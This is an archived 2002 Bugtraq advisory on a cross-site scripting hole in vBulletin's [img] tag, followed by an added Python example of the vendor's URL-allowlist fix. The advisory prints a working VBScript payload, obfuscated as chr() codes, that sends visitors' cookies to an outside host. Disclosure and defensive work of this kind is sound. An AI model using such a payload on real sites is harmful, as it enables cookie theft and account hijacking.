[24777] in bugtraq

[img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe older

daemon@ATHENA.MIT.EDU (Cano2)
Thu Mar 21 03:01:42 2002

Date: Wed, 20 Mar 2002 19:29:30 +0100
From: Cano2 <Cano2@buhaboard.de>
Reply-To: Cano2 <Cano2@buhaboard.de>
Message-ID: <6616824973.20020320192930@buhaboard.de>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

Hi

I've discovered a vulnerability in vBulletin's [img]-tag
implementation that allows users to inject VBS code into posts and
private messages ([img] is switched on by default).
Through that, an attacker is able to steal other users' cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a PHP script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser).
It is enclosed in a [code] tag; the URL is encoded in ASCII and
line breaks are inserted to avoid filtering of some characters and
insertion of <br> tags.

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://".
            Sounds good ;)


 vBulletin 2.2.3 & 2.2.4 have been out for some weeks, but there are
 still sites using vulnerable versions, so better update!
 

lates, Cano2                          mailto:Cano2@buhaboard.de

--
Truly rich are those who have more dreams than reality can destroy

BuHa-Security Board
www.buhaboard.de
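
The fix quoted in the History section (an [img] value must start with http:// and may only contain a restricted character set) can be modelled as below. This is an added example, not part of the original post and not Jelsoft's code; the function names, the exact character allowlist and the sample post are assumptions made for illustration.

```python
import html
import re

# Assumed allowlist, following the vendor's description: the value must start
# with http:// and may contain only plain URL characters. Quotes, parentheses,
# angle brackets, whitespace and line breaks are all outside the set, so the
# check does not depend on recognising any particular script scheme.
_SAFE_URL = re.compile(r"http://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+")
_IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

# Constructed sample post: one ordinary image and one tag shaped like the
# payload in the advisory (shortened).
CONSTRUCTED_POST = (
    "Look: [img]http://example.com/pic.gif[/img] and "
    "[img]vbscript:location.replace(\nchr(104)+escape(document.cookie)\n)[/img]"
)


def is_safe_img_url(url: str) -> bool:
    """True only if the whole value matches the allowlist (no trailing junk)."""
    return _SAFE_URL.fullmatch(url) is not None


def render_img_tags(post: str) -> str:
    """Render [img] tags as <img> only when the URL validates.

    All other text, including rejected tags, is HTML-escaped and stays inert.
    """
    out, pos = [], 0
    for match in _IMG_TAG.finditer(post):
        out.append(html.escape(post[pos:match.start()]))
        url = match.group(1)
        if is_safe_img_url(url):
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        else:
            # Rejected: emit the original tag as escaped literal text.
            out.append(html.escape(match.group(0)))
        pos = match.end()
    out.append(html.escape(post[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print(render_img_tags(CONSTRUCTED_POST))
```

Validation runs on the raw tag value before any HTML is produced, and a rejected tag is shown as text rather than silently rewritten, so a moderator can still see what was posted.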

